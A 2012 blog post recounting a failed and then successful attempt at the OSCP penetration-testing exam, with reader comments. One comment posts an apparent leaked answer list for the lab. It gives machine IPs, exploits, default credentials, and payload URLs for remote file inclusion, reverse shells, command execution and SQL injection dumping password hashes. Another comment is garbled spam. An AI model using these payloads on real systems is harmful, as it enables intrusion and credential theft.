Thursday 12 July 2012

How (not) to flunk in OSCP

Finally, I am an OSCP ! *Fist pump* Took a while, but it was totally worth every second. My friends have been asking me to blog about my experience or to give out tips, but considering my stumbles I felt I should write a post about 'How (not) to flunk in OSCP'.  :) 

Before I start my rant, a little background - I am new to the security domain, entered it about a year and a half back. I've mostly worked with web app pentesting. Also, my Linux skills were pretty much zilch before OSCP. So basically, "God knows what I was thinking when I enrolled for OSCP :O " ! Now onward!

Next time someone tells you that the OSCP certification is a different league, give them a cookie, because they are right! The lab work and the exam are the most exciting and taxing thing I have ever been through. On an average, be ready to invest atleast 5 hrs a day for 60 days breaking into every lab machines. I made the mistake of jumping into the exam too early and taking it too lightly, what was the end result? I screwed up... royally.

I didn't break into enough machines within 24 hrs and flunked. After my dismal performance, I crawled under a rock and started rethinking my line of work. Some encouragement and support from friends and family helped calm me down, I started analyzing the situation and realized that the exam was doable, difficult but doable nonetheless.  I started trying to figure out all the mistakes I had made - to start with I didn't pay enough importance to enumeration (The cardinal sin!), I also gave up too soon. One statement you will continuously hear when you start taking the course is, "Try harder". You'll continue hearing it until you grow tired of it, but its true, you cannot get through the course unless you try harder. 

After loads of practice and long hours of listening to 'Eye of the tiger', I got ready for round 2. As soon as my exam package arrived I started with the enumeration. Nmap tcp, udp, scripts on all machines, on all ports. I also started up hydra with the standard usernames and passwords, afterall you never know when you'll get lucky :D Armed with the data I started on the easier machines, with some points in the basket I gained a bit of confidence. Once I had gotten into 2 machines I took a break (more like forcibly dragged off for lunch). But the break was very helpful, armed with a sugar high and a fresher mind I broke into another box. The last few points were the hardest, but I eventually got there and the rest is history. 

The most common question that most people have is, "When will I know I am ready to take the exam?". I could give you a mystical and kung-fooey answer - "You will know, when you are ready". But of what use would that be? Once you get all the network keys you will know that you are ready for the exam, at least that is what I observed.  Breaking into lab machines will give you good edge in the exam, and breaking into lab machines with more than one way will give an even better edge.

Winning formula - (Lab exercises + enumeration ) * (persistence + commitment + thinking outside the box) = OSCP :) 


Some resources which helped me immensely -
 

6 comments:

  1. Am waiting for you to write more posts! warri0r_ sent me the link. I start my OSCP class this weekend.

    ReplyDelete
  2. Congratulation on clearing OSCP

    ReplyDelete
  3. Hi,How much did you pay for re-taking the exam ?

    ReplyDelete
  4. if you need any help email me a.sharabati@gmail.com
    by Ahmad Adel Moh. Sharabati
    address os_name os_sp purpose name
    192.168.13.201 Windows XP client SMB MS08-067
    192.168.13.202 Ubuntu Server RFI - priv:Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
    192.168.13.203 Windows 2000 server WebDav
    192.168.13.204 Windows 2000 server WebDav
    192.168.13.205 Windows 2000 server pass the hash from 206
    192.168.13.206 Windows 2000 server SMB MS08-067
    192.168.13.207 Windows XP client
    192.168.13.208 Linux 2.4.X server RFI - priv:Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
    192.168.13.209 OpenSolaris device tomcat - default account
    192.168.13.210 Windows 2003 server coldfusion 8
    192.168.13.214 Linux 3.X server
    192.168.13.215 Linux redhat samba 2.2.7a
    192.168.13.216 FreeBSD 7.X device csm php lite admin
    192.168.13.218 Windows 2008 server
    192.168.13.219 Linux 3.X server
    192.168.13.220 Windows 7 client
    192.168.13.221 Windows 2008 server
    192.168.13.222 ExtremeXOS 12.X device Samba 2.2.3a
    192.168.13.223 Windows 2008 server
    192.168.13.224 embedded device LFI NIKTO - brute force : bob user bob password
    192.168.13.225 Windows 2000 server telnet 192.168.13.225:123 --> MiniShare /windows/remote/616.c
    192.168.13.226 Windows 2003 server using metasploit be fast kill python.exe and migrate the process
    192.168.13.227 Windows 2000 server SMB MS08-067
    192.168.13.229 Windows 2003 server SMB MS08-067
    192.168.13.230 NetWare 6.X device
    192.168.13.231 Windows 2003 server SMB MS08-067
    192.168.13.234 Linux 2.6.X server https://www.exploit-db.com/exploits/15704/
    192.168.13.235 Linux 2.6.X server http://192.168.13.235/section.php?page=http://192.168.12.137/reverse_php.txt
    192.168.13.236 embedded device
    192.168.13.237 Linux 2.6.X server https://www.exploit-db.com/exploits/18650/
    192.168.13.238 Linux 3.X server
    192.168.13.239 Windows 2008 server ms09_050_smb2_negotiate_func_index
    192.168.13.241 Linux 2.6.X server http://192.168.13.241:10000/unauthenticated/..%01/..%01/%01/..%01/..%01/..%01/..%01/..%01//tmp/perl-reverse-shell.cgi
    192.168.13.242 Linux 2.6.X server alice user alice
    192.168.13.244 Linux 2.6.X server
    192.168.13.245 Windows 2008 server ms09_050_smb2_negotiate_func_index
    192.168.13.247 Windows 2000 server
    192.168.13.249 Android 2.X device FTP Pro
    192.168.13.250 Windows Vista client http://192.168.13.250:9505/?search={.exec|C:\Users\Public\Downloads\crypt.exe.}
    192.168.13.251 Linux 2.6.X server http://192.168.13.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23
    192.168.13.252 Linux 2.6.X server Time Sheet https://www.exploit-db.com/exploits/1518/

    ReplyDelete
  5. Ahmad is this the answers to the exam? I would take that down!!

    ReplyDelete
  6. Casino & Gaming - Mapyro
    Get 익산 출장마사지 directions, reviews and information for Casino 남원 출장마사지 & Gaming 영주 출장샵 in El Cajon, CA. El Cajon Casino Hotel El Cajon, CA, 87401. 통영 출장샵 Rating: 3.9 · ‎25 reviews

    ReplyDelete